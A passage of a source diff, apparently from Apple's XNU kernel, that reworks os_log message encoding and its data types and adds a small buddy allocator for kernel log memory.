(uintptr_t)address : VM_KERNEL_UNSLIDE(address); + size_t len = sizeof(uintptr_t); + +#if __LP64__ + len = 6; // 48 bits are enough +#endif + memcpy(buf, (uintptr_t[]){ shift_addr }, len); + + return len; +} + +static void +os_log_encode_location(os_log_context_t ctx, void *addr, void *dso, bool driverKit, + firehose_tracepoint_flags_t *ft_flags) +{ + const size_t hdr_size = write_address_location(ctx->ctx_buffer, dso, addr, ft_flags, driverKit); + ctx->ctx_hdr = (os_log_fmt_hdr_t)&ctx->ctx_buffer[hdr_size]; + ctx->ctx_content_sz = (uint16_t)(ctx->ctx_buffer_sz - hdr_size - sizeof(*ctx->ctx_hdr)); +} + +/* + * Encodes argument (meta)data into a format consumed by libtrace. Stores + * metadata for all arguments first. Metadata also includes scalar argument + * values. Second step saves data which are encoded separately from respective + * metadata (like strings). + */ +bool +os_log_context_encode(os_log_context_t ctx, const char *fmt, va_list args, void *addr, void *dso, bool driverKit) +{ + os_log_encode_location(ctx, addr, dso, driverKit, &ctx->ctx_ft_flags); + + va_list args_copy; + va_copy(args_copy, args); + + int rc = log_encode_fmt(ctx, fmt, args); + + va_end(args_copy); + + switch (rc) { + case EINVAL: + // Bogus/Unsupported fmt string + counter_inc(&oslog_p_fmt_invalid_msgcount); + return false; + case ENOMEM: + /* + * The fmt contains an unreasonable number of arguments (> 32) and + * we ran out of space. We could call log_expand() + * here and retry. However, using such formatting strings rather + * seems like a misuse of the logging system, hence error. 
+ */ + counter_inc(&oslog_p_fmt_max_args_msgcount); + return false; + case 0: + break; + default: + panic("unhandled return value"); + } + + if (ctx->ctx_pubdata_sz == 0) { + goto finish; + } + + if (!log_fits(ctx, ctx->ctx_pubdata_sz)) { + size_t space_needed = log_context_cursor(ctx) + ctx->ctx_pubdata_sz - ctx->ctx_buffer; + space_needed = MIN(space_needed, logmem_max_size(ctx->ctx_logmem)); + (void) log_expand(ctx, space_needed); + } + + log_encode_public_data(ctx); + + if (ctx->ctx_truncated) { + counter_inc(&oslog_p_truncated_msgcount); + } +finish: + ctx->ctx_content_sz = (uint16_t)(log_context_cursor(ctx) - ctx->ctx_buffer); + ctx->ctx_content_off = 0; + return true; +} + +void +os_log_context_init(os_log_context_t ctx, logmem_t *logmem, uint8_t *buffer, size_t buffer_sz) +{ + assert(logmem); + assert(buffer); + assert(buffer_sz > 0); + + bzero(ctx, sizeof(*ctx)); + ctx->ctx_logmem = logmem; + ctx->ctx_buffer = buffer; + ctx->ctx_buffer_sz = buffer_sz; +} + +void +os_log_context_free(os_log_context_t ctx) +{ + if (ctx->ctx_allocated) { + logmem_free(ctx->ctx_logmem, ctx->ctx_buffer, ctx->ctx_buffer_sz); + } +} diff --git a/libkern/os/log_encode.h b/libkern/os/log_encode.h index 82f2ac21d..40be98626 100644 --- a/libkern/os/log_encode.h +++ b/libkern/os/log_encode.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2015-2016 Apple Inc. All rights reserved. + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. 
* * @APPLE_LICENSE_HEADER_START@ * @@ -25,507 +25,9 @@ #define log_encode_h #include "log_encode_types.h" -#include -#if __has_feature(ptrauth_calls) -#include -#include -#endif /* __has_feature(ptrauth_calls) */ - -#ifdef KERNEL -#define isdigit(ch) (((ch) >= '0') && ((ch) <= '9')) -extern boolean_t doprnt_hide_pointers; -#endif - -static bool -_encode_data(os_log_buffer_value_t content, const void *arg, size_t arg_len, os_log_buffer_context_t context) -{ - struct os_log_arginfo_s arginfo; - void *databuf; - - arg_len = MIN(arg_len, UINT16_MAX); - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - databuf = context->privdata + context->privdata_off; - arginfo.length = MIN((uint16_t)arg_len, (context->privdata_sz - context->privdata_off)); - arginfo.offset = context->privdata_off; - } else { - databuf = context->pubdata + context->pubdata_off; - arginfo.length = MIN((uint16_t)arg_len, (context->pubdata_sz - context->pubdata_off)); - arginfo.offset = context->pubdata_off; - } - - if (context->arg_content_sz > 0) { - arginfo.length = MIN((uint16_t)context->arg_content_sz, arginfo.length); - } - - memcpy(content->value, &arginfo, sizeof(arginfo)); - content->size = sizeof(arginfo); - - if (arginfo.length) { - if (content->type == OS_LOG_BUFFER_VALUE_TYPE_STRING -#ifndef KERNEL - || content->type == OS_LOG_BUFFER_VALUE_TYPE_OBJECT -#endif - ) { - strlcpy(databuf, arg, arginfo.length); - } else { - memcpy(databuf, arg, arginfo.length); - } - } - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - context->privdata_off += arginfo.length; - } else { - context->pubdata_off += arginfo.length; - } - - context->content_off += sizeof(*content) + content->size; - context->arg_content_sz = 0; - - return true; -} - -#ifndef KERNEL -static void -_os_log_parse_annotated(char *annotated, const char **visibility, const char **library, const char **type) -{ - char *values[3] = { NULL }; - int cnt = 0; - int idx = 0; - - for (; cnt < 3;) { - char *token = strsep(&annotated, ", 
{}"); - if (token == NULL) { - break; - } - - if (*token == '\0') { - continue; - } - - values[cnt++] = token; - } - - if ((cnt > 0) && (!strcmp(values[0], "public") || !strcmp(values[0], "private"))) { - if (visibility != NULL) { - (*visibility) = values[0]; - } - - idx++; - } - - if (idx < cnt && (library != NULL) && (type != NULL)) { - char *decoder = values[idx]; - - for (cnt = 0; cnt < 3;) { - char *token = strsep(&decoder, ": {}"); - if (token == NULL) { - break; - } - - if (*token == '\0') { - continue; - } - - values[cnt++] = token; - } - - if (cnt == 2) { - (*library) = values[0]; - (*type) = values[1]; - } - - if (cnt == 1) { - (*library) = "builtin"; - (*type) = values[0]; - } - } -} -#endif /* !KERNEL */ - -OS_ALWAYS_INLINE -static inline bool -_os_log_encode_arg(void *arg, size_t arg_len, os_log_value_type_t ctype, bool is_private, os_log_buffer_context_t context) -{ - os_log_buffer_value_t content = (os_log_buffer_value_t) &context->buffer->content[context->content_off]; - size_t content_sz = sizeof(*content) + arg_len; - char tempString[OS_LOG_BUFFER_MAX_SIZE] = {}; -#ifndef KERNEL - bool obj_private = true; -#endif - -#ifdef KERNEL - /* scrub kernel pointers */ - if (doprnt_hide_pointers && - ctype == OS_LOG_BUFFER_VALUE_TYPE_SCALAR && - arg_len >= sizeof(void *)) { - unsigned long long value = 0; - memcpy(&value, arg, arg_len); - -#if __has_feature(ptrauth_calls) - /** - * Strip out the pointer authentication code before - * checking whether the pointer is a kernel address. - */ - value = (unsigned long long)VM_KERNEL_STRIP_PTR(value); -#endif /* __has_feature(ptrauth_calls) */ - - if (value >= VM_MIN_KERNEL_AND_KEXT_ADDRESS && value <= VM_MAX_KERNEL_ADDRESS) { - is_private = true; - bzero(arg, arg_len); - } - } -#endif - - content->type = ctype; - content->flags = (is_private ? 
OS_LOG_CONTENT_FLAG_PRIVATE : 0); - -#ifndef KERNEL - if (context->annotated != NULL) { - const char *visibility = NULL; - - _os_log_parse_annotated(context->annotated, &visibility, NULL, NULL); - if (visibility) { - if (!strcasecmp(visibility, "private")) { - content->flags |= OS_LOG_CONTENT_FLAG_PRIVATE; - } else if (!strcasecmp(visibility, "public")) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - } - - context->annotated = NULL; - } -#endif /* !KERNEL */ - - switch (ctype) { - case OS_LOG_BUFFER_VALUE_TYPE_COUNT: - case OS_LOG_BUFFER_VALUE_TYPE_SCALAR: - if (is_private) { - _encode_data(content, tempString, strlen(tempString) + 1, context); - } else { - if ((context->content_off + content_sz) > context->content_sz) { - return false; - } - - memcpy(content->value, arg, arg_len); - content->size = (uint8_t)arg_len; - context->content_off += content_sz; - } - break; - - case OS_LOG_BUFFER_VALUE_TYPE_STRING: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - if (_os_log_string_is_public(arg)) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - - _encode_data(content, arg, arg_len, context); - break; - -#ifndef KERNEL - case OS_LOG_BUFFER_VALUE_TYPE_POINTER: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _encode_data(content, arg, arg_len, context); - break; - - case OS_LOG_BUFFER_VALUE_TYPE_OBJECT: - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - if (!_NSCF2data(arg, tempString, sizeof(tempString), &obj_private)) { - tempString[0] = '\0'; - } - - if (!obj_private) { - content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE; - } - - _encode_data(content, tempString, strlen(tempString) + 1, context); - break; -#endif /* !KERNEL */ - } - - if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) { - context->buffer->flags |= OS_LOG_BUFFER_HAS_PRIVATE; - } - - context->arg_idx++; - - return true; -} - -static bool -_os_log_encode(const char *format, va_list args, int saved_errno, os_log_buffer_context_t context) -{ - const char *percent 
= strchr(format, '%'); -#ifndef KERNEL - char annotated[256]; -#endif - - while (percent != NULL) { - ++percent; - if (percent[0] != '%') { - struct os_log_format_value_s value; - int type = OST_INT; -#ifndef KERNEL - bool long_double = false; -#endif - int prec = 0; - char ch; - - for (bool done = false; !done; percent++) { - switch (ch = percent[0]) { - /* type of types or other */ - case 'l': // longer - type++; - break; - - case 'h': // shorter - type--; - break; - - case 'z': - type = OST_SIZE; - break; - - case 'j': - type = OST_INTMAX; - break; - - case 't': - type = OST_PTRDIFF; - break; - - case '.': // precision - if ((percent[1]) == '*') { - prec = va_arg(args, int); - _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context); - percent++; - continue; - } else { - // we have to read the precision and do the right thing - const char *fmt = percent + 1; - prec = 0; - while (isdigit(ch = *fmt++)) { - prec = 10 * prec + (ch - '0'); - } - - if (prec > 1024) { - prec = 1024; - } - - _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context); - } - break; - - case '-': // left-align - case '+': // force sign - case ' ': // prefix non-negative with space - case '#': // alternate - case '\'': // group by thousands - break; - - /* fixed types */ - case 'd': // integer - case 'i': // integer - case 'o': // octal - case 'u': // unsigned - case 'x': // hex - case 'X': // upper-hex - switch (type) { - case OST_CHAR: - value.type.ch = (char) va_arg(args, int); - _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_SHORT: - value.type.s = (short) va_arg(args, int); - _os_log_encode_arg(&value.type.s, sizeof(value.type.s), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_INT: - value.type.i = va_arg(args, int); - _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, 
context); - break; - - case OST_LONG: - value.type.l = va_arg(args, long); - _os_log_encode_arg(&value.type.l, sizeof(value.type.l), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_LONGLONG: - value.type.ll = va_arg(args, long long); - _os_log_encode_arg(&value.type.ll, sizeof(value.type.ll), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_SIZE: - value.type.z = va_arg(args, size_t); - _os_log_encode_arg(&value.type.z, sizeof(value.type.z), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_INTMAX: - value.type.im = va_arg(args, intmax_t); - _os_log_encode_arg(&value.type.im, sizeof(value.type.im), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - case OST_PTRDIFF: - value.type.pd = va_arg(args, ptrdiff_t); - _os_log_encode_arg(&value.type.pd, sizeof(value.type.pd), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - break; - - default: - return false; - } - done = true; - break; - -#ifndef KERNEL - case '{': - // we do not support this for shimmed code - if (context->shimmed) { - return false; - } - - for (const char *curr2 = percent + 1; (ch = (*curr2)) != NUL; curr2++) { - if (ch == '}') { - strlcpy(annotated, percent, MIN(curr2 - (percent + 1), sizeof(annotated))); - context->annotated = annotated; - percent = curr2; - break; - } - } - break; -#endif /* !KERNEL */ - - case 'p': // pointer - value.type.p = va_arg(args, void *); - _os_log_encode_arg(&value.type.p, sizeof(value.type.p), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - -#ifndef KERNEL - case 'P': // pointer data - if (context->shimmed) { // we do not support this for shimmed code - return false; - } - - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - value.type.p = va_arg(args, void *); - - // capture the string pointer to generate a symptom - if (context->log && context->log->generate_symptoms && context->arg_idx == 1 && value.type.pch && prec) { - context->symptom_ptr = 
value.type.p; - context->symptom_ptr_len = prec; - } - - _os_log_encode_arg(value.type.p, prec, OS_LOG_BUFFER_VALUE_TYPE_POINTER, false, context); - prec = 0; - done = true; - break; -#endif /* !KERNEL */ - -#ifndef KERNEL - case 'L': // long double - long_double = true; - break; - - case 'a': case 'A': case 'e': case 'E': // floating types - case 'f': case 'F': case 'g': case 'G': - if (long_double) { - value.type.ld = va_arg(args, long double); - _os_log_encode_arg(&value.type.ld, sizeof(value.type.ld), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - } else { - value.type.d = va_arg(args, double); - _os_log_encode_arg(&value.type.d, sizeof(value.type.d), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - } - done = true; - break; -#endif /* !KERNEL */ - - case 'c': // char - value.type.ch = (char) va_arg(args, int); - _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - -#ifndef KERNEL - case 'C': // wide-char - value.type.wch = va_arg(args, wint_t); - _os_log_encode_arg(&value.type.wch, sizeof(value.type.wch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; -#endif /* !KERNEL */ - - case 's': // string - value.type.pch = va_arg(args, char *); - if (!prec && value.type.pch != NULL) { - prec = (int) strlen(value.type.pch) + 1; - } - -#ifndef KERNEL - // capture the string pointer to generate a symptom - if (context->log && context->log->generate_symptoms && context->arg_idx == 0 && value.type.pch) { - context->symptom_str = value.type.pch; - } -#endif - - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(value.type.pch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context); - prec = 0; - done = true; - break; - -#ifndef KERNEL - case 'S': // wide-string - value.type.pwch = va_arg(args, wchar_t *); - if (!prec && value.type.pwch != NULL) { - prec = (int) wcslen(value.type.pwch) + 1; - } - - context->buffer->flags |= 
OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(value.type.pwch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context); - prec = 0; - done = true; - break; -#endif /* !KERNEL */ - -#ifndef KERNEL - case '@': // CFTypeRef aka NSObject * - context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR; - _os_log_encode_arg(va_arg(args, void *), 0, OS_LOG_BUFFER_VALUE_TYPE_OBJECT, false, context); - done = true; - break; -#endif /* !KERNEL */ - - case 'm': - value.type.i = saved_errno; - _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context); - done = true; - break; - - default: - if (isdigit(ch)) { // [0-9] - continue; - } - return false; - } - - if (done) { - percent = strchr(percent, '%'); // Find next format - break; - } - } - } else { - percent = strchr(percent + 1, '%'); // Find next format after %% - } - } - - context->buffer->arg_cnt = context->arg_idx; - context->content_sz = context->content_off; - context->pubdata_sz = context->pubdata_off; - context->privdata_sz = context->privdata_off; - context->arg_idx = context->content_off = context->pubdata_off = context->privdata_off = 0; - - return true; -} +void os_log_context_init(os_log_context_t, logmem_t *, uint8_t *, size_t); +void os_log_context_free(os_log_context_t); +bool os_log_context_encode(os_log_context_t, const char *, va_list, void *, void *, bool); #endif /* log_encode_h */ diff --git a/libkern/os/log_encode_types.h b/libkern/os/log_encode_types.h index ac4b44bdb..23a995bd1 100644 --- a/libkern/os/log_encode_types.h +++ b/libkern/os/log_encode_types.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2015-2016 Apple Inc. All rights reserved. + * Copyright (c) 2015-2020 Apple Inc. All rights reserved. 
* * @APPLE_LICENSE_HEADER_START@ * @@ -36,24 +36,30 @@ #include #include +#include "log_mem.h" + #pragma mark - buffer support structures, enums -OS_ENUM(os_log_value_type, uint8_t, - OS_LOG_BUFFER_VALUE_TYPE_SCALAR = 0, - OS_LOG_BUFFER_VALUE_TYPE_COUNT = 1, - OS_LOG_BUFFER_VALUE_TYPE_STRING = 2, -#ifndef KERNEL - OS_LOG_BUFFER_VALUE_TYPE_POINTER = 3, - OS_LOG_BUFFER_VALUE_TYPE_OBJECT = 4, -#endif +OS_ENUM(os_log_fmt_hdr_flags, uint8_t, + OSLF_HDR_FLAG_HAS_PRIVATE = 0x01, + OSLF_HDR_FLAG_HAS_NON_SCALAR = 0x02, + ); + +OS_ENUM(os_log_fmt_cmd_type, uint8_t, + OSLF_CMD_TYPE_SCALAR = 0, // %u, %lld, %x, %p, %g, ... + OSLF_CMD_TYPE_COUNT = 1, // %.16P, %.*s + OSLF_CMD_TYPE_STRING = 2, // %s + OSLF_CMD_TYPE_POINTER = 3, // %P + OSLF_CMD_TYPE_OBJECT = 4, // %@ + OSLF_CMD_TYPE_WIDE_STRING = 5, // %S + OSLF_CMD_TYPE_ERRNO = 6, // %m + OSLF_CMD_TYPE_MASK = 7, // %{mask.foo}... ); -OS_ENUM(os_log_value_subtype, uint8_t, - OS_LOG_BUFFER_VALUE_SUBTYPE_NONE = 0, - OS_LOG_BUFFER_VALUE_SUBTYPE_INTEGER = 1, -#ifndef KERNEL - OS_LOG_BUFFER_VALUE_SUBTYPE_FLOAT = 2, -#endif +OS_ENUM(os_log_fmt_cmd_flags, uint8_t, + OSLF_CMD_FLAG_PRIVATE = 0x1, + OSLF_CMD_FLAG_PUBLIC = 0x2, + OSLF_CMD_FLAG_SENSITIVE = 0x4 | OSLF_CMD_FLAG_PRIVATE, ); enum os_log_int_types_t { @@ -67,7 +73,7 @@ enum os_log_int_types_t { OST_PTRDIFF = 5, }; -union os_log_format_types_u { +union os_log_fmt_types_u { uint16_t u16; uint32_t u32; uint64_t u64; @@ -76,100 +82,53 @@ union os_log_format_types_u { int i; void *p; char *pch; -#ifndef KERNEL - wchar_t wch; - wchar_t *pwch; -#endif size_t z; intmax_t im; ptrdiff_t pd; long l; long long ll; -#ifndef KERNEL - double d; - float f; - long double ld; -#endif }; typedef struct os_log_format_value_s { - union os_log_format_types_u type; - os_log_value_type_t ctype; + union os_log_fmt_types_u type; + os_log_fmt_cmd_type_t ctype; uint16_t size; } *os_log_format_value_t; -#define OST_FORMAT_MAX_ARGS 48 -#ifdef KERNEL -#define OST_FORMAT_MAX_STRING_SIZE 512 -#else -#define 
OST_FORMAT_MAX_STRING_SIZE 1024 -#endif - -#define OST_FORMAT_NON_STATIC ~0 - -typedef struct os_log_buffer_value_s { -#define OS_LOG_CONTENT_FLAG_PRIVATE 0x1 - uint8_t flags : 4; - os_log_value_type_t type : 4; - uint8_t size; - uint8_t value[]; -} *os_log_buffer_value_t; - -typedef struct os_log_buffer_s { -#define OS_LOG_BUFFER_HAS_PRIVATE 0x1 -#define OS_LOG_BUFFER_HAS_NON_SCALAR 0x2 - uint8_t flags; - uint8_t arg_cnt; - uint8_t content[]; -} *os_log_buffer_t; - -typedef struct os_log_buffer_context_s { - os_log_t log; - os_log_buffer_t buffer; - uint8_t *pubdata; - uint8_t *privdata; - - // composed string - char *comp; - size_t comp_off; - size_t comp_sz; - - // sizes and offsets - uint16_t content_off; // offset into buffer->content - uint16_t content_sz; // size not including the header - uint16_t pubdata_off; - uint16_t pubdata_sz; - uint16_t privdata_off; - uint16_t privdata_sz; - - uint8_t arg_idx; - - // if argument content was limited with %.* or %.# - -#ifndef KERNEL - const char *symptom_str; - const void *symptom_ptr; - uint16_t symptom_ptr_len; - char *annotated; -#endif - int arg_content_sz; - bool need_size; - bool shimmed; -} *os_log_buffer_context_t; - -typedef struct os_log_arginfo_s { - uint16_t offset; - uint16_t length; -} *os_log_arginfo_t; - -/* Clients of these interfaces/structures may be expected to provide implementations of the following functions */ +typedef struct os_log_fmt_hdr_s { + os_log_fmt_hdr_flags_t hdr_flags; + uint8_t hdr_cmd_cnt; + uint8_t hdr_data[]; +} *os_log_fmt_hdr_t; -#ifndef KERNEL -extern bool -_NSCF2data(const void *obj, char *string_value, size_t string_sz, bool *is_private); -#endif +typedef struct os_log_fmt_cmd_s { + os_log_fmt_cmd_flags_t cmd_flags : 4; + os_log_fmt_cmd_type_t cmd_type : 4; + uint8_t cmd_size; + uint8_t cmd_data[]; +} *os_log_fmt_cmd_t; -extern bool -_os_log_string_is_public(const char *str); +typedef struct os_log_fmt_range_s { + uint16_t offset; + uint16_t length : 15; + uint16_t 
truncated : 1; +} *os_log_fmt_range_t; + +#define OS_LOG_MAX_PUB_ARGS (32) + +typedef struct os_log_context_s { + logmem_t *ctx_logmem; + uint8_t *ctx_buffer; + size_t ctx_buffer_sz; + os_log_fmt_hdr_t ctx_hdr; + char *ctx_pubdata[OS_LOG_MAX_PUB_ARGS]; + uint16_t ctx_content_off; // offset into buffer->hdr_data + uint16_t ctx_content_sz; // size not including the header + uint16_t ctx_pubdata_sz; + uint16_t ctx_pubdata_cnt; + firehose_tracepoint_flags_t ctx_ft_flags; + uint8_t ctx_truncated : 1; + uint8_t ctx_allocated : 1; +} *os_log_context_t; #endif /* log_encode_types_h */ diff --git a/libkern/os/log_mem.c b/libkern/os/log_mem.c new file mode 100644 index 000000000..311082b9a --- /dev/null +++ b/libkern/os/log_mem.c @@ -0,0 +1,217 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include + +#include "log_mem.h" + +#define BLOCK_INVALID ((size_t)-1) +#define BLOCK_LEVEL_BASE(level) ((1 << (level)) - 1) +#define BLOCK_SIZE(level) (1 << (level)) +#define BLOCK_PARENT(b) (((b) % 2 == 0) ? 
((b) >> 1) - 1 : ((b) >> 1)) +#define BLOCK_LCHILD(b) (((b) << 1) + 1) +#define BLOCK_BUDDY(b) (((b) & 0x1) ? (b) + 1 : (b) - 1) +#define BLOCK_INDEX(lm, l, a, s) \ + (BLOCK_LEVEL_BASE(l) + ((uintptr_t)(a) - (uintptr_t)(lm)->lm_mem) / (s)) + +#define BITMAP_BUCKET_SIZE (8 * sizeof(((logmem_t *)0)->lm_mem_map[0])) +#define BITMAP_BUCKET(i) ((i) / BITMAP_BUCKET_SIZE) +#define BITMAP_BIT(i) (1 << (BITMAP_BUCKET_SIZE - ((i) % BITMAP_BUCKET_SIZE) - 1)) + +static bool +bitmap_get(logmem_t *lm, size_t block) +{ + return lm->lm_mem_map[BITMAP_BUCKET(block)] & BITMAP_BIT(block); +} + +static void +bitmap_set(logmem_t *lm, size_t block) +{ + lm->lm_mem_map[BITMAP_BUCKET(block)] |= BITMAP_BIT(block); +} + +static void +bitmap_clear(logmem_t *lm, size_t block) +{ + lm->lm_mem_map[BITMAP_BUCKET(block)] &= ~BITMAP_BIT(block); +} + +static void +bitmap_reserve_root(logmem_t *lm, size_t block) +{ + const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order); + + for (ssize_t next = BLOCK_PARENT(block); next >= top_block; next = BLOCK_PARENT(next)) { + /* + * If the rest of the root path is already marked as + * allocated we are done. + */ + if (bitmap_get(lm, next)) { + break; + } + bitmap_set(lm, next); + } +} + +static void +bitmap_release_root(logmem_t *lm, size_t block) +{ + const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order); + int buddy_allocated = 0; + + while (block > top_block) { + buddy_allocated = bitmap_get(lm, BLOCK_BUDDY(block)); + block = BLOCK_PARENT(block); + /* + * If there is another allocation within the parent subtree + * in place we cannot mark the rest of the root path as free. 
+ */ + if (buddy_allocated) { + break; + } + bitmap_clear(lm, block); + } +} + +static void +bitmap_update_subtree(logmem_t *lm, size_t level, size_t block, void (*fun)(logmem_t *, size_t)) +{ + const size_t lcount = lm->lm_cap_order - lm->lm_min_order - level + 1; + + for (size_t l = 0, n = 1; l < lcount; l++, n <<= 1) { + for (int i = 0; i < n; i++) { + fun(lm, block + i); + } + block = BLOCK_LCHILD(block); + } +} + +static void +bitmap_release_subtree(logmem_t *lm, size_t level, size_t block) +{ + bitmap_update_subtree(lm, level, block, bitmap_clear); +} + +static void +bitmap_reserve_subtree(logmem_t *lm, size_t level, size_t block) +{ + bitmap_update_subtree(lm, level, block, bitmap_set); +} + +static size_t +block_size_level(logmem_t *lm, size_t amount) +{ + for (size_t l = lm->lm_min_order; l <= lm->lm_max_order; l++) { + if (amount <= BLOCK_SIZE(l)) { + return lm->lm_cap_order - l; + } + } + return BLOCK_INVALID; +} + +static size_t +block_locate(logmem_t *lm, void *addr, size_t amount, size_t *block) +{ + size_t level = block_size_level(lm, amount); + if (level != BLOCK_INVALID) { + *block = BLOCK_INDEX(lm, level, addr, amount); + } + return level; +} + +static size_t +block_reserve(logmem_t *lm, size_t level) +{ + assert(level != BLOCK_INVALID); + + const size_t base = BLOCK_LEVEL_BASE(level); + const size_t end = base + BLOCK_SIZE(level); + + lck_spin_lock(lm->lm_lock); + for (size_t block = base; block < end; block++) { + if (!bitmap_get(lm, block)) { + bitmap_reserve_root(lm, block); + bitmap_reserve_subtree(lm, level, block); + lck_spin_unlock(lm->lm_lock); + return block - base; + } + } + lck_spin_unlock(lm->lm_lock); + + return BLOCK_INVALID; +} + +void * +logmem_alloc(logmem_t *lm, size_t *amount) +{ + assert(amount); + + os_atomic_inc(&lm->lm_cnt_allocations, relaxed); + + if (*amount == 0 || *amount > BLOCK_SIZE(lm->lm_max_order)) { + os_atomic_inc(&lm->lm_cnt_failed_size, relaxed); + return NULL; + } + + size_t level = block_size_level(lm, 
*amount); + size_t block = block_reserve(lm, level); + + if (block == BLOCK_INVALID) { + os_atomic_inc(&lm->lm_cnt_failed_full, relaxed); + return NULL; + } + + *amount = BLOCK_SIZE(lm->lm_cap_order - level); + os_atomic_sub(&lm->lm_cnt_free, (uint32_t)*amount, relaxed); + + return &lm->lm_mem[block * *amount]; +} + +void +logmem_free(logmem_t *lm, void *addr, size_t amount) +{ + assert(addr); + assert(amount > 0 && ((amount & (amount - 1)) == 0)); + + size_t block = BLOCK_INVALID; + size_t level = block_locate(lm, addr, amount, &block); + assert(level != BLOCK_INVALID); + assert(block != BLOCK_INVALID); + + lck_spin_lock(lm->lm_lock); + bitmap_release_root(lm, block); + bitmap_release_subtree(lm, level, block); + lck_spin_unlock(lm->lm_lock); + + os_atomic_add(&lm->lm_cnt_free, (uint32_t)amount, relaxed); +} + +size_t +logmem_max_size(const logmem_t *lm) +{ + return BLOCK_SIZE(lm->lm_max_order); +} diff --git a/libkern/os/log_mem.h b/libkern/os/log_mem.h new file mode 100644 index 000000000..d29ca2b19 --- /dev/null +++ b/libkern/os/log_mem.h @@ -0,0 +1,84 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
+ * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#ifndef log_mem_h +#define log_mem_h + +#include +#include + +/* + * A simple allocator on top of a plain byte array. Primarily intended to + * support OS kernel logging in order to avoid a dependency on the VM. + */ +typedef struct logmem_s { + lck_spin_t *lm_lock; + uint8_t *lm_mem; + uint8_t *lm_mem_map; + size_t lm_cap_order; + size_t lm_min_order; + size_t lm_max_order; + uint32_t lm_cnt_allocations; + uint32_t lm_cnt_failed_size; + uint32_t lm_cnt_failed_full; + uint32_t lm_cnt_free; +} logmem_t; + +/* + * Static initializer for global instances of logmem. Size order defines the + * total amount of logmem memory, the min and max order set the minimum and the + * maximum size respectively of the memory allocatable by the given logmem. + * Local or dynamically allocated instances of logmem should not be initialized + * by this macro. + */ +#define LOGMEM_STATIC_INIT(name, size_order, min_order, max_order) \ + SIMPLE_LOCK_DECLARE(name##_lck, 0); \ + logmem_t name = { \ + .lm_lock = (lck_spin_t *)&name##_lck, \ + .lm_mem = (uint8_t[(1 << (size_order))]){ 0 }, \ + 